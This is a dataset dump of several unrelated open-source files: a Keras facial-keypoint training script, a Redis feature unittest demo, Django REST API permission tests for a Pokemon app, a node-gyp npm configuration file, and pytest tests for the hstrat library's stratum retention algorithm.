1a0d279e90e4a7293faf975c284a15a6bfa3eb66 | f93e413230460cf86f35cd0bc5db74fed9539efb | /fkd-specials.py | 6acadf53b1e0f238195f4046d3b76d49b61d8f1a | [] | no_license | danielevian/facial-keypoints-detection-keras | 34045eb66092fd003ad10fc964956d0958db2296 | 2ec2ae4b31a0c588db0d85a50085d7546c105930 | refs/heads/master | 2021-01-12T09:30:08.002992 | 2016-12-13T15:41:06 | 2016-12-13T15:41:06 | 76,171,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,966 | py | from __future__ import print_function
import numpy as np
from keras.models import Sequential, load_model
from keras.layers import Dense, Activation, Dropout, Convolution2D, MaxPooling2D, Flatten
from keras.optimizers import Adam
import h5py
import matplotlib.pyplot as plt
from pandas import read_csv
import pandas as pd
import math
#### TRAINING DATA
dataframe = read_csv("training.csv")
dataframe_wo_na = dataframe.dropna() # I'm wasting a LOT of training data!!
## 1. BASE MODEL
image_data = dataframe_wo_na["Image"].apply(lambda im: np.fromstring(im, sep = ' '))
X_train = np.vstack(image_data.values) / 255.
X_train = X_train.astype(np.float32)
y_train = (dataframe_wo_na[dataframe_wo_na.columns[:-1]] - 48) / 48
X_train = X_train.reshape(-1,1,96,96) # to get into conv layer
# --> model = load_model('fkd-1.h5')
model = Sequential()
model.add(Convolution2D(16, 2,2, subsample=(1,1), border_mode='same',input_shape = (1,96,96)))
model.add(Activation('relu'))
model.add(MaxPooling2D((2,2), (1,1), border_mode='same'))
model.add(Convolution2D(16, 3,3, subsample=(1,1),border_mode='same'))
model.add(Activation('relu'))
model.add(Dropout(0.3))
model.add(Flatten())
model.add(Dense(100))
model.add(Activation('relu'))
model.add(Dropout(0.3))
model.add(Dense(30))
model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mean_squared_error'])
history = model.fit(X_train, y_train.values, batch_size = 64, nb_epoch = 200, shuffle = True, validation_split = 0.3) # › 1.7306
model.save('fkd-base.h5')
## then i run the "special" detectors
history = []
for i in range(0,30,2): # for every feature
model = Sequential()
model.add(Convolution2D(16, 2,2, subsample=(1,1), border_mode='same',input_shape = (1,96,96)))
model.add(Activation('relu'))
model.add(MaxPooling2D((2,2), (1,1), border_mode='same'))
model.add(Dropout(0.3))
model.add(Convolution2D(16, 3,3, subsample=(1,1),border_mode='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D((2,2), (1,1), border_mode='same'))
model.add(Dropout(0.3))
model.add(Convolution2D(32, 2,2, subsample=(2,2),border_mode='same'))
model.add(Activation('relu'))
model.add(Dropout(0.3))
model.add(Flatten())
model.add(Dense(80))
model.add(Activation('relu'))
model.add(Dropout(0.3))
model.add(Dense(2))
model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mean_squared_error'])
df = dataframe.iloc[:,i:i+2].join(dataframe["Image"]).dropna()
image_data = df["Image"].apply(lambda im: np.fromstring(im, sep = ' '))
X_train = np.vstack(image_data.values) / 255.
X_train = X_train.astype(np.float32)
y_train = (df[df.columns[:-1]] - 48) / 48
X_train = X_train.reshape(-1,1,96,96) # to get into conv layer
history.append(model.fit(X_train, y_train.values, batch_size = 64, nb_epoch = 200, shuffle = True))
model.save("fkd--{0}.h5".format(i))
## ALRIGHT: Now that I have ma model, Imma predict and save submission for y'all.
test = read_csv('test.csv')
# test.columns => Index(['ImageId', 'Image'], dtype='object')
id_lookup_table = read_csv('IdLookupTable.csv')
# id_lookup_table.columns => Index(['RowId', 'ImageId', 'FeatureName', 'Location'], dtype='object')
submission = read_csv('SampleSubmission.csv')
submission['Location'] = submission['Location'].astype(np.float32)
cols = ['ImgId', 'left_eye_center_x','left_eye_center_y','right_eye_center_x','right_eye_center_y','left_eye_inner_corner_x','left_eye_inner_corner_y','left_eye_outer_corner_x','left_eye_outer_corner_y','right_eye_inner_corner_x','right_eye_inner_corner_y','right_eye_outer_corner_x','right_eye_outer_corner_y','left_eyebrow_inner_end_x','left_eyebrow_inner_end_y','left_eyebrow_outer_end_x','left_eyebrow_outer_end_y','right_eyebrow_inner_end_x','right_eyebrow_inner_end_y','right_eyebrow_outer_end_x','right_eyebrow_outer_end_y','nose_tip_x','nose_tip_y','mouth_left_corner_x','mouth_left_corner_y','mouth_right_corner_x','mouth_right_corner_y','mouth_center_top_lip_x','mouth_center_top_lip_y','mouth_center_bottom_lip_x','mouth_center_bottom_lip_y']
features = pd.DataFrame(columns=cols, index=range(test.shape[0]))
for j in range(0,30,2):
print("model {0}".format(j))
model = load_model("fkd--{0}.h5".format(j))
h = 0
for imageId, imageData in test.values:
print("# {0}".format(imageId))
image = np.array(imageData.split()).astype(np.float32) / 255.0
y = model.predict(image.reshape(1,1,96,96), verbose=0)
y = y*48 + 48
if features.loc[lambda df: df.ImgId == imageId].shape[0] == 0:
features.iloc[h]['ImgId'] = imageId
h += 1
features.loc[lambda df: df.ImgId == imageId, cols[j+1]:cols[j+2]] = y
q = "ImageId == {0}".format(imageId)
rows = id_lookup_table.query(q)
for rowid, image_id, feature_name, location in rows.values:
a = submission.set_value(rowid - 1, 'Location', features.loc[lambda df: df.ImgId == image_id, feature_name])
submission.dropna()
out = submission['Location']
out = pd.DataFrame(out)
out.to_csv('submission-4.csv', index='RowId')
| [
"daniele@misiedo.com"
] | daniele@misiedo.com |
b757933424dbae9f916e93a4298ec35fe9220b03 | a2c3eb07ed4ed7beba217e61bece352881c0bef6 | /projeto2/antlr4-python3-runtime-4.7.2/src/autogen/GrammarCheckerVisitor.py | ffbec44629ea4f004820cfe0b7c143a88c44fa77 | [] | no_license | samuelbrasileiro/compiladores | d47a044e84e70f9f991e991cfed9b108dc25aa6a | 7408ebfde130b7114a7d0f2d60f0480ad0e0f03c | refs/heads/master | 2023-05-03T18:29:08.948046 | 2021-05-17T13:44:21 | 2021-05-17T13:44:21 | 349,994,460 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | ../../../GrammarCheckerVisitor.py | [
"samuelbsantosn@gmail.com"
] | samuelbsantosn@gmail.com |
be44df7fee11dfc53e80ffa6769c71965ba34ccc | 864312a2184d0c9ac73b6b5d962bd0f34bf9ee42 | /redisdemo.py | 20eec91d23270d4cda098c80785514edd50fbd3d | [] | no_license | erikdejonge/redisdemo | e1250f1829ed042638d64409c2426469006f40f1 | 5ded8ab6cf986a19f46010b934abe9a5142f7d9b | refs/heads/master | 2020-04-20T09:24:41.420048 | 2019-02-25T16:13:32 | 2019-02-25T16:13:32 | 168,764,872 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,524 | py | # coding=utf-8
"""
Testscript for redis
"""
import unittest
import random
import time
import redis
from multiprocessing import Pool, Process
REDISHOST = '127.0.0.1'
# noinspection PyUnusedLocal
def return_redis_mylist(counter):
"""
pop one item from the beginning of the list
"""
global REDISHOST
# decode responses is for utf8 return values
remoterediscon = redis.Redis(host=REDISHOST, decode_responses=True)
return remoterediscon.lpop("mylist")
class RedisTest(unittest.TestCase):
"""
redis
"""
rcon = None
def setUp(self):
"""
setUp
"""
global REDISHOST
self.REDISHOST = REDISHOST
# make connection attribute, decode responses is for utf8 return values
self.rcon = redis.Redis(host=self.REDISHOST, decode_responses=True)
def test_make_conn(self):
"""
connection should be made by now
"""
self.assertIsNotNone(self.rcon)
def test_scalar_string_no_driver_decoding(self):
"""
setting and getting of a single string
"""
# without decode_responses we get bytestrings
self.rcon = redis.Redis(host=self.REDISHOST)
# in case of failed tests
self.rcon.delete("mystr")
thestr = "Hello world! 🙂"
self.rcon.set("mystr", thestr)
mystr = self.rcon.get("mystr")
# Carefull: redis returns binary strings (not encoded)
self.assertNotEqual(thestr, mystr)
# decode to the default (utf8)
mystr = mystr.decode()
# now they should be equal
self.assertEqual(thestr, mystr)
def test_scalar_string(self):
"""
setting and getting of a single string
"""
# in case of failed tests
self.rcon.delete("mystr")
thestr = "Hello world! 🙂"
self.rcon.set("mystr", thestr)
mystr = self.rcon.get("mystr")
# now they should be equal
self.assertEqual(thestr, mystr)
def test_scalar_int(self):
"""
set and get integer
"""
# in case of failed tests
self.rcon.delete("somenumber")
# a random int as the value
randomnumber = random.randint(-100, 100)
self.rcon.set("somenumber", randomnumber)
# Be carefull all data is stored as a string
somenumber = self.rcon.get("somenumber")
self.assertNotEqual(somenumber, randomnumber)
# cast the string to an int
somenumber = int(somenumber)
self.assertEqual(somenumber, randomnumber)
# delete key
self.rcon.delete("somenumber")
# shoyld return None now
somenumber = self.rcon.get("somenumber")
self.assertIsNone(somenumber)
def test_counters(self):
"""
set a counter (atomic)
"""
# make a counter by increasing it with startnumber
self.rcon.delete("mycounter")
self.rcon.incr("mycounter", 2)
self.assertEqual(int(self.rcon.get("mycounter")), 2)
self.rcon.incr("mycounter", 2)
self.rcon.incr("mycounter", 4)
self.assertEqual(int(self.rcon.get("mycounter")), 8)
def test_list(self):
"""
test a list, this is like a global list and atomic, multiple programs can pop this
"""
self.rcon.delete("mylist")
# first in last out list
self.rcon.lpush("mylist", "🙂")
self.rcon.lpush("mylist", "world!")
self.rcon.lpush("mylist", "Hello")
self.assertEqual(self.rcon.llen("mylist"), 3)
# get the list as a whole
# getting it as scalar throws exception
with self.assertRaises(redis.exceptions.ResponseError):
self.rcon.get("mylist")
# left pop the list untill its empty
mylist = []
spart = self.rcon.lpop("mylist")
while spart:
mylist.append(spart)
spart = self.rcon.lpop("mylist")
mystring = " ".join(mylist)
self.assertEqual(mystring, "Hello world! 🙂")
def test_list_smp(self):
"""
pop a list from multiple processes
"""
self.rcon.delete("mylist")
# a local and a redis with 100 random numbers
verifylist = []
for i in range(0, 100):
rnum = random.randint(0, 100)
verifylist.append(rnum)
self.rcon.lpush("mylist", rnum)
# call the popitem method a 100 times
pool = Pool(processes=4)
returnedlist = pool.map(return_redis_mylist, range(0, 100))
returnedlist = sorted([int(val) for val in returnedlist])
# sort both lists, should be the same
verifylist.sort()
self.assertEqual(returnedlist, verifylist)
def test_hash(self):
"""
Hash items are like dictionaries
"""
self.rcon.delete("mydict")
# set the dict (dictname, key value)
self.rcon.hset("mydict", "naam", "adisor")
self.rcon.hset("mydict", "city", "rotterdam")
# the redis driver returns a dict
mydict = {"naam": "adisor",
"city": "rotterdam"}
self.assertEqual(self.rcon.hgetall("mydict"), mydict)
def test_set(self):
"""
a set is a unique list like in python
"""
self.rcon.delete("myset")
myset = set()
for i in [1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 4, 5, 5]:
myset.add(i)
self.rcon.sadd("myset", i)
# seeems to return it as a list
rmyset = sorted([int(val) for val in self.rcon.smembers("myset")])
mysetlist = list(myset)
self.assertEqual(mysetlist, rmyset)
def test_pubsub(self):
"""
"""
self.rcon.delete("mylist")
def pub(myredis):
"""
this is a publisher, can be whatever event, could for example be a click somewhere in javascript
"""
for n in range(5):
myredis.publish('myevents', 'the number is %d' % n)
time.sleep(0.01)
def sub(myredis, name):
"""
This is the subscriber method, this method is waiting around in a Process
could be something like a cronjob, or just a good way to propate an event
instead of functions calling each other, since that could lead to tight coupling.
A microservice architecture would be a perfect fit, mini webservices working together
with redis as the working memory.
"""
pubsub = myredis.pubsub()
# can subscribe to multiple events
pubsub.subscribe(['myevents', 'myotherevents'])
# an item is a dict with the following keys, type, pattern, channel, data
# in this case it looks something like this
# {'type': 'message',
# 'pattern': None,
# 'channel': 'myevents',
# 'data': 'the number is 4'}
for item in pubsub.listen():
# push the received item in a shared list on redis.
myredis.lpush("mylist", str(name) + ": " + str(item['data']))
# start the publisher (user clicking on a button or program notifying that it's done)
p0 = Process(target=pub, args=(self.rcon,))
p0.start()
# start two subscribers
p1 = Process(target=sub, args=(self.rcon, 'reader1'))
p1.start()
# the just catch the data and push it in a shared list
p2 = Process(target=sub, args=(self.rcon, 'reader2'))
p2.start()
# wait a little while, there is a small delay between the events
time.sleep(0.2)
# process are killed now, in real life they could be still running for example cronjobs?
p0.terminate()
p1.terminate()
p2.terminate()
# loop the redislist and make a normal list
mylist = []
while self.rcon.llen('mylist') != 0:
mylist.append(self.rcon.lpop("mylist"))
mylist.sort()
listtocheck = ['reader1: 1', 'reader1: 2', 'reader1: the number is 1', 'reader1: the number is 2', 'reader1: the number is 3', 'reader1: the number is 4', 'reader2: 1', 'reader2: 2', 'reader2: the number is 1', 'reader2: the number is 2', 'reader2: the number is 3', 'reader2: the number is 4']
self.assertEqual(mylist, listtocheck)
def main():
"""
run unittests
"""
unittest.main()
if __name__ == '__main__':
main()
| [
"rabshakeh@xanthos-2.local"
] | rabshakeh@xanthos-2.local |
b9447235a9f1441e7e0f13347182a735b12dbb79 | e29c9744a714da2705d76047e56b8d9ae3607ec8 | /api/apps/pokemons/api/v1/tests.py | ef7f958d7ab3aeb45d8f009e4b694894e095b0b2 | [] | no_license | medinan/ixpandit-tests | d27c0c815b0cde345bd99a0896b2d2a5bab524dd | bd7a6fd02efc33f6c057983d866af205ba2d6f26 | refs/heads/main | 2023-09-03T20:12:00.759333 | 2021-11-01T20:52:43 | 2021-11-01T20:52:43 | 421,535,190 | 0 | 0 | null | 2021-11-01T20:52:44 | 2021-10-26T18:11:37 | CSS | UTF-8 | Python | false | false | 2,369 | py | from rest_framework import status
from rest_framework.test import APITestCase
from utils.tests.mixins.factories import UserFactory
from utils.tests.mixins.simple_api import SimpleAPITestCaseMixin
from ...tests.factories import PokemonFactory
class PokemonAnonymousUserAPITestCase(SimpleAPITestCaseMixin, APITestCase):
factory_class = PokemonFactory
base_name_api = "pokemons"
authenticate_user = False
def test_list(self):
response = self.case_list()
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_detail(self):
response = self.case_detail()
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_create(self):
response = self.case_create()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_delete(self):
response = self.case_delete()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_update(self):
response = self.case_update()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class PokemonAuthenticatedUser(SimpleAPITestCaseMixin, APITestCase):
factory_class = PokemonFactory
base_name_api = "pokemons"
authenticate_user = True
def create_user(self):
return UserFactory.create()
def get_data_to_create_object(self):
return {
"name": "Picachu",
"poke_id": 152,
"height": 350.00,
"weight": 450.77,
"image": "https://www.imagenes.com/image.png",
}
def get_data_to_update_object(self):
return {"name": "Pikachu"}
def test_list(self):
response = self.case_list()
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_detail(self):
response = self.case_detail()
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_create(self):
response = self.case_create()
self.assertEqual(
response.status_code, status.HTTP_201_CREATED, response.__dict__
)
def test_delete(self):
response = self.case_delete()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_update(self):
response = self.case_update()
self.assertEqual(response.status_code, status.HTTP_200_OK)
| [
"noreply@github.com"
] | noreply@github.com |
50ae2b79f3722abd6f8e9deec39e107c7e331cb3 | 6ae36417415bfe9aafa4daa98c00ee7407f88f01 | /golabs/gocloud/gumball/nodejs/gumball_v6/node_modules/kerberos/build/config.gypi | 47735b99ef72a8cd4c4a8f9faeea2812627d6210 | [
"Apache-2.0"
] | permissive | pkouda/cmpe281 | 9992f7ec725dad9afc0c9144d677018f8077cddd | 8ef8133b4e69b8e3fdb5ad392d6f101edbadb8ce | refs/heads/master | 2021-05-08T15:45:10.712851 | 2018-02-03T06:05:19 | 2018-02-03T06:05:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,980 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"coverage": "false",
"debug_devtools": "node",
"debug_http2": "false",
"debug_nghttp2": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt59l.dat",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt59l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "59",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 57,
"node_no_browser_globals": "false",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "57.dylib",
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/pnguyen/.node-gyp/8.9.0",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"commit_hooks": "true",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/bash",
"metrics_registry": "https://registry.npmjs.org/",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"timing": "",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"fetch_retries": "2",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"logs_max": "10",
"prefer_online": "",
"cache_lock_retries": "10",
"global_style": "",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"offline": "",
"read_only": "",
"searchlimit": "20",
"access": "",
"json": "",
"allow_same_version": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/pnguyen/.npm-init.js",
"userconfig": "/Users/pnguyen/.npmrc",
"cidr": "",
"node_version": "8.9.0",
"user": "",
"auth_type": "legacy",
"editor": "vi",
"ignore_prepublish": "",
"save": "true",
"script_shell": "",
"tag": "latest",
"global": "",
"progress": "true",
"ham_it_up": "",
"optional": "true",
"searchstaleness": "900",
"bin_links": "true",
"force": "",
"save_prod": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"sso_poll_frequency": "500",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"scripts_prepend_node_path": "warn-only",
"sso_type": "oauth",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"prefer_offline": "",
"version": "",
"cache_min": "10",
"otp": "",
"cache": "/Users/pnguyen/.npm",
"searchexclude": "",
"color": "true",
"package_lock": "true",
"save_optional": "",
"user_agent": "npm/5.5.1 node/v8.9.0 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"send_metrics": "",
"init_version": "1.0.0",
"umask": "0022",
"scope": "",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/var/folders/qv/f6jwf0792tn89p5fnqx5c6g80000gn/T",
"unsafe_perm": "true",
"link": "",
"prefix": "/usr/local"
}
}
| [
"paul.nguyen@sjsu.edu"
] | paul.nguyen@sjsu.edu |
b1e7bc2ea6a672534d6f1fe70f55d35439a84b1f | cd40b7cc395f36740000ed4a4144b1c0666ab0fd | /tests/test_hstrat/test_stratum_retention_strategy/test_stratum_retention_algorithms/test_recency_proportional_resolution_algo/test_IterRetainedRanks.py | e25d30f8fbb8105935530e3c749ac1f26bb0365f | [
"MIT"
] | permissive | mmore500/hstrat | 94fd22c86a87a5707590b9398ef679444ed82d6d | b2d2caded1db5e2dc681d9f171d7c74b322c55c3 | refs/heads/master | 2023-08-31T03:36:44.457576 | 2023-08-25T14:39:29 | 2023-08-25T14:39:29 | 464,531,144 | 5 | 2 | NOASSERTION | 2023-08-25T13:07:52 | 2022-02-28T15:11:45 | Python | UTF-8 | Python | false | false | 7,230 | py | import itertools as it
import numbers
from iterpop import iterpop as ip
import numpy as np
import pytest
from hstrat._auxiliary_lib import all_same, pairwise
from hstrat.hstrat import recency_proportional_resolution_algo
@pytest.mark.parametrize(
"recency_proportional_resolution",
[
0,
1,
2,
3,
7,
],
)
@pytest.mark.parametrize(
"time_sequence",
[
range(10**3),
(i for i in range(10**2) for __ in range(2)),
np.random.default_rng(1).integers(
low=0,
high=2**32,
size=10,
),
(2**32,),
],
)
def test_impl_consistency(recency_proportional_resolution, time_sequence):
policy = recency_proportional_resolution_algo.Policy(
recency_proportional_resolution
)
spec = policy.GetSpec()
impls = [
*recency_proportional_resolution_algo._scry._IterRetainedRanks_.impls
]
instances = [impl(spec) for impl in impls] + [
lambda __, num_strata_deposited: policy.IterRetainedRanks(
num_strata_deposited
)
]
for num_strata_deposited in time_sequence:
assert all_same(
it.chain(
(
list(
impl(spec)(
policy,
num_strata_deposited,
)
)
for impl in impls
),
(
list(
instance(
policy,
num_strata_deposited,
)
)
for instance in instances
),
)
)
@pytest.mark.parametrize(
"impl",
recency_proportional_resolution_algo._scry._IterRetainedRanks_.impls,
)
@pytest.mark.parametrize(
"recency_proportional_resolution",
[
0,
1,
2,
3,
7,
42,
97,
100,
],
)
@pytest.mark.parametrize(
"time_sequence",
[
range(10**3),
(i for i in range(10**2) for __ in range(2)),
np.random.default_rng(1).integers(
low=0,
high=2**32,
size=10,
),
(2**32,),
],
)
def test_only_dwindling_over_time(
impl, recency_proportional_resolution, time_sequence
):
policy = recency_proportional_resolution_algo.Policy(
recency_proportional_resolution
)
spec = policy.GetSpec()
instance = impl(spec)
for num_strata_deposited in time_sequence:
for which in (instance, impl(spec)):
cur_set = {
*which(
policy,
num_strata_deposited,
)
}
next_set = {
*which(
policy,
num_strata_deposited + 1,
)
}
assert cur_set.issuperset(next_set - {num_strata_deposited})
@pytest.mark.parametrize(
"impl",
recency_proportional_resolution_algo._scry._IterRetainedRanks_.impls,
)
@pytest.mark.parametrize(
"recency_proportional_resolution",
[
0,
1,
2,
3,
7,
42,
97,
100,
],
)
@pytest.mark.parametrize(
"time_sequence",
[
range(10**3),
(i for i in range(10**2) for __ in range(2)),
np.random.default_rng(1).integers(
low=0,
high=2**32,
size=10,
),
(2**32,),
],
)
def test_ranks_sorted_and_unique(
impl, recency_proportional_resolution, time_sequence
):
policy = recency_proportional_resolution_algo.Policy(
recency_proportional_resolution
)
spec = policy.GetSpec()
instance = impl(spec)
for num_strata_deposited in time_sequence:
for which in (instance, impl(spec)):
assert all(
i < j
for i, j in pairwise(
which(
policy,
num_strata_deposited,
)
)
)
@pytest.mark.parametrize(
"impl",
recency_proportional_resolution_algo._scry._IterRetainedRanks_.impls,
)
@pytest.mark.parametrize(
"recency_proportional_resolution",
[
0,
1,
2,
3,
7,
42,
97,
100,
],
)
@pytest.mark.parametrize(
"time_sequence",
[
range(10**3),
(i for i in range(10**2) for __ in range(2)),
np.random.default_rng(1).integers(
low=0,
high=2**32,
size=10,
),
(2**32,),
],
)
def test_zero_and_last_ranks_retained(
impl, recency_proportional_resolution, time_sequence
):
policy = recency_proportional_resolution_algo.Policy(
recency_proportional_resolution
)
spec = policy.GetSpec()
instance = impl(spec)
for num_strata_deposited in time_sequence:
for which in instance, impl(spec):
res = which(
policy,
num_strata_deposited,
)
if num_strata_deposited > 1:
first, *middle, last = res
assert first == 0
assert last == num_strata_deposited - 1
elif num_strata_deposited == 1:
assert ip.popsingleton(res) == 0
else:
assert next(res, None) is None
@pytest.mark.parametrize(
"impl",
recency_proportional_resolution_algo._scry._IterRetainedRanks_.impls,
)
@pytest.mark.parametrize(
"recency_proportional_resolution",
[
0,
1,
2,
3,
7,
42,
97,
100,
],
)
@pytest.mark.parametrize(
"time_sequence",
[
range(10**3),
(i for i in range(10**2) for __ in range(2)),
np.random.default_rng(1).integers(
low=0,
high=2**32,
size=10,
),
(2**32,),
],
)
def test_ranks_valid(impl, recency_proportional_resolution, time_sequence):
policy = recency_proportional_resolution_algo.Policy(
recency_proportional_resolution
)
spec = policy.GetSpec()
instance = impl(spec)
for num_strata_deposited in time_sequence:
for which in (instance, impl(spec)):
assert all(
isinstance(r, numbers.Integral)
and 0 <= r < num_strata_deposited
for r in which(policy, num_strata_deposited)
)
@pytest.mark.parametrize(
"impl",
recency_proportional_resolution_algo._scry._IterRetainedRanks_.impls,
)
@pytest.mark.parametrize(
"recency_proportional_resolution",
[
0,
1,
2,
3,
7,
42,
97,
100,
],
)
def test_eq(impl, recency_proportional_resolution):
policy = recency_proportional_resolution_algo.Policy(
recency_proportional_resolution
)
spec = policy.GetSpec()
instance = impl(spec)
assert instance == instance
assert instance == impl(spec)
assert instance is not None
| [
"mmore500.login+gpg@gmail.com"
] | mmore500.login+gpg@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.